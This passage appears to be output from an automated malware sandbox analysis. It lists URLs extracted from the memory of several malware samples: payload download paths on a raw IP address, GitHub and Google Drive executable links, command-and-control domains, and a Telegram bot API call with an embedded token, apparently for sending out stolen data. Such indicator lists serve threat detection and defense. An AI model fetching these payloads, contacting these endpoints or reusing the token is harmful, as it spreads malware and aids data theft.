Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/kardanvalov88/random.exeJ#
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe8476
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exeO:
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exexe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/loadman/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/martin/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/martin/random.exes:4
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/zhigarko/random.exe
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/zhigarko/random.exeb?
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EC7000.00000004.00000020.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763
Source: b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EC7000.00000004.00000020.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2943794217.0000000001EB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=CmXX9uDEYSg7ov7J1734779763G
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://html4/loose.dtd
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: skotes.exe, 00000005.00000002.2942570852.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 322c3dce5b.exe, 00000033.00000002.2940029679.0000000002321000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 5f0a381314.exe, 00000006.00000000.2443755959.0000000000423000.00000002.00000001.01000000.00000009.sdmp, 5f0a381314.exe.5.dr String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: b2885fa695.exe, 00000020.00000003.2630727981.00000000056AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/-GB
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/1
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/:Gr
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/CO3r
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/a
Source: 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E36587C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://api.telegram.org/botFailed
Source: 4115805b10.exe, 00000028.00000002.2819650802.000001E365837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/grkrs
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/h
Source: 4115805b10.exe, 00000028.00000002.2820245543.000001E3661E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/ogle
Source: 4115805b10.exe, 00000027.00000002.2797099055.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2795798018.0000026810A08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/p
Source: b2885fa695.exe, 00000020.00000003.2661685253.0000000005661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: b2885fa695.exe, 00000020.00000003.2559287290.0000000000D13000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/
Source: b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/9
Source: b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/Q
Source: b2885fa695.exe, 00000020.00000003.2686595989.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2691499194.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759368892.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2736603243.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2662018084.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759950146.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D0A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2759950146.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2764183695.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2768801255.000000000566B000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2692865661.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2661685253.000000000566B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api
Source: b2885fa695.exe, 00000020.00000003.2758836379.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api%L8
Source: b2885fa695.exe, 00000020.00000003.2759119506.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2765530714.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2735992155.0000000000D84000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2736434954.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api5RJ1JZ
Source: b2885fa695.exe, 00000020.00000003.2706084690.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api:L_
Source: b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2692865661.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiCN
Source: b2885fa695.exe, 00000020.00000003.2559195373.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiD
Source: b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiGM
Source: b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2692865661.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiIN
Source: b2885fa695.exe, 00000020.00000003.2686509398.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apioca
Source: b2885fa695.exe, 00000020.00000003.2758836379.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000002.2765612695.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2706084690.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click:443/apic
Source: 4115805b10.exe, 00000028.00000003.2690889016.000001E365822000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: 4115805b10.exe, 00000027.00000003.2670828927.0000026810994000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2670730816.0000026810978000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore-l
Source: 4115805b10.exe, 00000027.00000003.2670828927.0000026810994000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2670730816.0000026810978000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore2R
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 4115805b10.exe, 00000027.00000003.2670730816.0000026810978000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx0B
Source: 4115805b10.exe, 00000027.00000003.2671262555.0000026810961000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671446840.0000026810961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx1F11
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx7ED0
Source: 4115805b10.exe, 00000027.00000003.2671674540.0000026810983000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2670962130.000002681097E000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671383618.000002681097F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxLB
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxip:i
Source: b2885fa695.exe, 00000020.00000003.2661685253.0000000005661000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 4115805b10.exe, 00000028.00000003.2692021259.000001E36584F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: 4115805b10.exe, 00000028.00000003.2690027055.000001E365823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: 4115805b10.exe, 00000027.00000003.2670498259.0000026810976000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2690201104.000001E365831000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2690027055.000001E365823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: 4115805b10.exe, 00000028.00000003.2690201104.000001E365831000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2690027055.000001E365823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultr
Source: random[2].exe0.5.dr String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365817000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.c
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: 4115805b10.exe, 00000027.00000003.2670694562.0000026810962000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2671173239.0000026810966000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp2
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: 4115805b10.exe, 00000027.00000002.2796654960.000002681097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.cosB
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365817000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.co
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: 4115805b10.exe, 00000028.00000003.2691236731.000001E365820000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: 4115805b10.exe, 00000028.00000003.2692021259.000001E36584F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://drive.google.com/uc?id=
Source: 4115805b10.exe, 00000027.00000002.2796654960.000002681097D000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E36582C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: 4115805b10.exe, 00000028.00000003.2772934497.000001E365891000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2795679412.000001E365891000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E365890000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download;
Source: 4115805b10.exe, 00000027.00000000.2649047959.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000027.00000002.2797453206.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000002.2820458214.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp, 4115805b10.exe, 00000028.00000000.2667326161.00007FF6BDA40000.00000002.00000001.01000000.00000012.sdmp String found in binary or memory: https://drive.google.com/uc?id=URL:
Source: 4115805b10.exe, 00000028.00000003.2772934497.000001E365891000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2772934497.000001E3658C4000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E3658C4000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2795679412.000001E3658C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: 4115805b10.exe, 00000027.00000003.2752797987.00000268109DE000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2774885034.00000268109DD000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2754133118.00000268109DD000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2795798018.00000268109D1000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2752333584.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2774431697.00000268109D5000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2774431697.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2754663756.00000268109DD000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000002.2797099055.00000268109D1000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2754663756.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2753904963.00000268109DB000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2753904963.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2753594593.00000268109C1000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2772934497.000001E365891000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: 4115805b10.exe, 00000028.00000003.2772934497.000001E365891000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2795679412.000001E365891000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E365890000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download7
Source: 4115805b10.exe, 00000028.00000003.2772934497.000001E365891000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000003.2795679412.000001E365891000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000028.00000002.2819650802.000001E365890000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadk
Source: 4115805b10.exe, 00000027.00000002.2797301812.00000268125B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadta
Source: 4115805b10.exe, 00000027.00000003.2752333584.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000002.2797099055.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2774431697.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2754663756.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2753904963.0000026810A08000.00000004.00000020.00020000.00000000.sdmp, 4115805b10.exe, 00000027.00000003.2795798018.0000026810A08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/i
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: b2885fa695.exe, 00000020.00000003.2582356457.00000000056AD000.00000004.00000800.00020000.00000000.sdmp, b2885fa695.exe, 00000020.00000003.2582557045.00000000056AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: skotes.exe, 00000005.00000002.2942570852.0000000000DEA000.00000004.00000020.00020000.00000000.sdmp, 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp String found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe
Source: 322c3dce5b.exe, 00000033.00000000.2907742348.0000000000032000.00000002.00000001.01000000.00000016.sdmp String found in binary or memory: https://github.com/Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://httpbin.org/ip
Source: b7c03317c9.exe, 0000002A.00000003.2782175661.0000000007A76000.00000004.00001000.00020000.00000000.sdmp, b7c03317c9.exe, 0000002A.00000002.2930917753.0000000000F9D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: https://httpbin.org/ipbefore
